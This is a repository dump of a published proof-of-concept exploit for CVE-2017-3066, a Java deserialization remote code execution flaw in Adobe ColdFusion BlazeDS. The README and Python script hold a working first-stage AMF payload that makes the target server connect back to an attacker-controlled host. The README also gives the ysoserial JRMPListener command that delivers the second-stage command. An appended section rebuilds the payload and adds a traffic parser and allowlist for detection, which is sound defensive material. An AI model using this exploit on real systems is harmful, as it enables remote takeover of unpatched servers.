├── README.md
└── cf_blazeds_des.py

/README.md:
--------------------------------------------------------------------------------
# Adobe Coldfusion BlazeDS Java Object Deserialization RCE

Exploit-DB: https://www.exploit-db.com/exploits/43993/

Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE

Date: February 6, 2018

Exploit Author: Faisal Tameesh (@DreadSystems)

Company: Depth Security (https://depthsecurity.com)

Version: Adobe Coldfusion (11.0.03.292866)

Tested On: Windows 10 Enterprise (10.0.15063)

CVE: CVE-2017-3066

Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html

Category: remote

Notes:
This is a two-stage deserialization exploit; cf_blazeds_des.py in this repository is the first stage.
It POSTs an AMF message to /flex2gateway/amf whose body is an AMF3 externalizable object of class
sun.rmi.server.UnicastRef pointing at callback_IP:callback_port; deserializing it makes the server
open an RMI connection to that address.
You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port, for example
java -cp ysoserial.jar ysoserial.exploit.JRMPListener callback_port <gadget> '<command>'
with a gadget chain that matches the libraries on the target's classpath.
After firing this exploit, and once the target server connects back, JRMPListener will deliver the
secondary payload for RCE. The target must therefore be able to reach callback_IP:callback_port
directly; if no connection arrives, the host is either patched with the updates listed in APSB17-14,
not exposing /flex2gateway/amf, or blocked from egress on that port.
--------------------------------------------------------------------------------
/cf_blazeds_des.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote

# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary payload for RCE.

import struct
import sys

import requests

if len(sys.argv) != 5:
    print("Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port")
    sys.exit(1)

target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]

# AMF0 envelope: version 3, 0 headers, 1 message with empty target and response
# URIs and an unknown (0xffffffff) body length, then the AVM+ marker (0x11) that
# switches the body to AMF3 and an AMF3 object marker (0x0a).
# Traits byte 0x07 = inline object, inline traits, externalizable; 0x33 = inline
# AMF3 string of length 25 ((25 << 1) | 1), the class whose readExternal() runs.
# UnicastRef.readExternal reads a LiveRef: host as a 2-byte-length UTF string,
# port as a 4-byte int, a 22-byte ObjID and a trailing boolean. Registering the
# ref with the DGC is what makes the server connect to callback_IP:callback_port.
amf_payload = (
    b'\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a'
    + b'\x07\x33' + b'sun.rmi.server.UnicastRef'
    + struct.pack('>H', len(callback_IP)) + callback_IP.encode('ascii')
    + struct.pack('>I', int(callback_port))
    + b'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00'
)

url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)

--------------------------------------------------------------------------------
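As an added example (not part of the original exploit or Depth Security's code): the same first-stage message built from named fields, alongside a small parser that walks an application/x-amf request body back to the externalizable class name and the RMI endpoint it would make the server dial. That parser is the check a WAF rule or an incident responder would run over captured traffic, and it goes a little beyond the single message on this page: it skips AMF0 headers and decodes multi-byte U29 lengths. The callback address 10.0.0.5:1099, the sample bodies and the ALLOWED_EXTERNALIZABLE allowlist are assumptions for illustration.

```python
import struct

AMF0_AVMPLUS = 0x11             # AMF0 marker: the value that follows is AMF3-encoded
AMF3_OBJECT = 0x0a              # AMF3 object marker
TRAITS_EXTERNALIZABLE = 0x07    # U29 traits: inline object, inline traits, externalizable
UNICAST_REF = "sun.rmi.server.UnicastRef"

# 22-byte ObjID (8-byte objNum, 4-byte UID.unique, 8-byte UID.time, 2-byte UID.count),
# copied from cf_blazeds_des.py; the connect-back is triggered by DGC registration of
# the ref, so any value works here.
DEFAULT_OBJID = bytes.fromhex("f96a767b7cde684f76d8aa3d0000015bb04c1d818001")


def encode_u29(n: int) -> bytes:
    """AMF3 variable-length U29 (1-3 byte forms; enough for class names and traits)."""
    if n < 0x80:
        return bytes([n])
    if n < 0x4000:
        return bytes([0x80 | (n >> 7), n & 0x7f])
    if n < 0x200000:
        return bytes([0x80 | (n >> 14), 0x80 | ((n >> 7) & 0x7f), n & 0x7f])
    raise ValueError("U29 values >= 2**21 not supported by this encoder")


def read_u29(buf: bytes, pos: int):
    """Decode a U29 at buf[pos]; the 4th byte, if present, carries 8 bits. Returns (value, new_pos)."""
    value = 0
    for i in range(4):
        b = buf[pos]
        pos += 1
        if i == 3:
            return (value << 8) | b, pos
        value = (value << 7) | (b & 0x7f)
        if not b & 0x80:
            return value, pos


def amf3_string(s: str) -> bytes:
    data = s.encode("utf-8")
    return encode_u29((len(data) << 1) | 1) + data      # low bit set = inline, not a reference


def read_amf3_string(buf: bytes, pos: int):
    n, pos = read_u29(buf, pos)
    if not n & 1:
        raise ValueError("string reference table not supported")
    length = n >> 1
    return buf[pos:pos + length].decode("utf-8"), pos + length


def build_amf_request(class_name: str, external_data: bytes) -> bytes:
    """AMF0 envelope (version 3, no headers, one message with empty target and response
    URIs and unknown length) wrapping one AMF3 externalizable object of class_name."""
    envelope = b"\x00\x03" + b"\x00\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\xff\xff\xff\xff"
    body = bytes([AMF0_AVMPLUS, AMF3_OBJECT]) + encode_u29(TRAITS_EXTERNALIZABLE)
    return envelope + body + amf3_string(class_name) + external_data


def build_first_stage(callback_ip: str, callback_port: int, objid: bytes = DEFAULT_OBJID) -> bytes:
    """Externalized LiveRef as UnicastRef.readExternal expects it:
    host (2-byte length + bytes), port (4-byte int), ObjID, isResultStream boolean."""
    host = callback_ip.encode("ascii")
    live_ref = struct.pack(">H", len(host)) + host + struct.pack(">I", callback_port) + objid + b"\x00"
    return build_amf_request(UNICAST_REF, live_ref)


def parse_externalizable(body: bytes):
    """Return {'class': ..., 'host': ..., 'port': ...} when the first message body is an
    AMF3 externalizable object (host/port only for UnicastRef), else None."""
    if len(body) < 6 or body[:2] != b"\x00\x03":
        return None
    try:
        pos = 2
        header_count, = struct.unpack(">H", body[pos:pos + 2]); pos += 2
        for _ in range(header_count):
            name_len, = struct.unpack(">H", body[pos:pos + 2]); pos += 2 + name_len
            pos += 1                                                  # must-understand flag
            hdr_len, = struct.unpack(">i", body[pos:pos + 4]); pos += 4
            if hdr_len < 0:
                return None                                           # unknown length: needs a full AMF0 parser
            pos += hdr_len
        msg_count, = struct.unpack(">H", body[pos:pos + 2]); pos += 2
        if msg_count == 0:
            return None
        for _ in range(2):                                            # target URI, response URI
            n, = struct.unpack(">H", body[pos:pos + 2]); pos += 2 + n
        pos += 4                                                      # body length (0xffffffff allowed)
        if body[pos] != AMF0_AVMPLUS or body[pos + 1] != AMF3_OBJECT:
            return None
        pos += 2
        traits, pos = read_u29(body, pos)
        if (traits & 0x07) != 0x07:
            return None                                               # plain object or a reference
        name, pos = read_amf3_string(body, pos)
        info = {"class": name}
        if name == UNICAST_REF:
            hlen, = struct.unpack(">H", body[pos:pos + 2]); pos += 2
            info["host"] = body[pos:pos + hlen].decode("ascii", "replace"); pos += hlen
            info["port"], = struct.unpack(">I", body[pos:pos + 4])
        return info
    except (struct.error, IndexError, UnicodeDecodeError, ValueError):
        return None


# Assumed allowlist: externalizable classes a Flex client legitimately sends to a BlazeDS
# endpoint. Any other externalizable class in a request body is worth an alert.
ALLOWED_EXTERNALIZABLE = {"flex.messaging.io.ArrayCollection", "flex.messaging.io.ObjectProxy"}


def is_suspicious(body: bytes) -> bool:
    info = parse_externalizable(body)
    return info is not None and info["class"] not in ALLOWED_EXTERNALIZABLE


if __name__ == "__main__":
    stage1 = build_first_stage("10.0.0.5", 1099)                     # constructed callback address
    print(parse_externalizable(stage1), is_suspicious(stage1))
```

build_first_stage("10.0.0.5", 1099) reproduces byte for byte what cf_blazeds_des.py sends for those arguments, and parse_externalizable recovers the class name, host and port from it, so the same function can be pointed at a captured request body to confirm where a compromised server was told to connect. The parser deliberately refuses anything it does not fully understand (header values of unknown length, string references) rather than guessing, which is the safe failure mode for a detection rule.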